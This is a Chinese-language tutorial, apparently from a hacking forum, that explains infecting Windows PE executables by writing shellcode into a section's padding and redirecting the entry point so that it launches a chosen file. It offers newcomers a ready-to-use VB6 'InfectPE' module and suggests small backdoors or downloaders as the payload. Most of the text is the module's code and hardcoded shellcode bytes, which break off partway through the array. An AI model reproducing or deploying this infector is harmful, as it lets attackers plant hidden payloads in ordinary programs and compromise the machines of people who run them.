感染PE似乎是新手一个不敢涉足的东西，其实还是比较简单的，我偶尔看到了一个见缝插针的小程序，后来联想到了这个感染方式。

见缝插针的功能是把一个小后门（例如1KB以下的下载者等等）先写到目标程序的00区，然后继续在00去加一段代码调用kernel32._lwrite写文件和winexec执行，修改文件入口到这段代码，执行完毕后再跳回去。思路相当好，没有新加区段，PE文件大小也不变。但是缺点就是他调用kernel32的函数的时候用的是本机的函数内存地址，没有用搜索，所以只能在本机使用，换一个机子执行这个被感染的程序就根本不能执行。

这个方法感觉跟加花程序很像很像，我的想法就有了，找一段Shellcode（什么功能自己看着办），然后写到区段的00区，然后修改入口点到Shellcode ，执行完了再跳回原入口！Shellcode使用了寻址调用winexec函数，比上述的程序的通用性要高多了，下面这段代码中用的Shellcode是seer同学的，代码我也附上了。

为了新手的使用方便，我整理成了一个模块，调用函数InfectPE（要感染的文件，要运行的文件名）
注：因为Shellcode的原因，要运行的文件名不能大于12个字符  比如12345678.exe 不能再长了  代码执行成功的话返回值为1 ，并且在目标程序的目录下生成 目标文件名.exe的新程序，运行这个被感染的EXE就会运行当前目录下的12345678.exe了

感染PE的模块代码：

Attribute VB_Name = "ModInfectPE"
Option Explicit

Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)

Private Type SectionHeader
    Name As String * 8
    RVA As Long
    VirtualSize As Long
    PhysicalSize As Long
    Offset As Long
    flags As Long
End Type

Private Const NeededArea As Long = 133

Dim PE() As Byte, e_lfanew As Long, NumberOfSections As Long, SizeOfOptionalHeader As Long, AddressOfEntryPoint As Long, NumberOfRvaAndSizes As Long
Dim EncStart As Long, EncEnd As Long, SectionTableOffset As Long, SectionTable() As SectionHeader, EntrySection As Long, PaddingArea As Long, tmp As Long
Dim PatchCode(NeededArea - 1) As Byte

Public Function InfectPE(ByVal strTargetFile As String, ByVal strRunFile As String) As Long

On Error GoTo ERR: '设置错误陷坑

'感染的Shellcode
PatchCode(0) = &H60
PatchCode(1) = &H55
PatchCode(2) = &H83
PatchCode(3) = &HEC
PatchCode(4) = &H40
PatchCode(5) = &H8B
PatchCode(6) = &HEC
PatchCode(7) = &H55
PatchCode(8) = &H64
PatchCode(9) = &HA1
PatchCode(10) = &H30
PatchCode(11) = &H0
PatchCode(12) = &H0
PatchCode(13) = &H0
PatchCode(14) = &H8B
PatchCode(15) = &H40
PatchCode(16) = &HC
PatchCode(17) = &H8B
PatchCode(18) = &H70
PatchCode(19) = &H1C
PatchCode(20) = &HAD
PatchCode(21) = &H8B
PatchCode(22) = &H78
PatchCode(23) = &H8
PatchCode(24) = &H8B
PatchCode(25) = &H47
PatchCode(26) = &H3C
PatchCode(27) = &H8B
PatchCode(28) = &H54
PatchCode(29) = &H7
PatchCode(30) = &H78
PatchCode(31) = &H3
PatchCode(32) = &HD7
PatchCode(33) = &H8B
PatchCode(34) = &H4A
PatchCode(35) = &H18
PatchCode(36) = &H8B
PatchCode(37) = &H5A
PatchCode(38) = &H20
PatchCode(39) = &H3
PatchCode(40) = &HDF
PatchCode(41) = &H49
PatchCode(42) = &H8B
PatchCode(43) = &H34
PatchCode(44) = &H8B
PatchCode(45) = &H3
PatchCode(46) = &HF7
PatchCode(47) = &HB8
PatchCode(48) = &H47
PatchCode(49) = &H65
PatchCode(50) = &H74
PatchCode(51) = &H50
PatchCode(52) = &H39
PatchCode(53) = &H6
PatchCode(54) = &H75
PatchCode(55) = &HF1
PatchCode(56) = &HB8
PatchCode(57) = &H72
PatchCode(58) = &H6F
PatchCode(59) = &H63
PatchCode(60) = &H41
PatchCode(61) = &H39
PatchCode(62) = &H46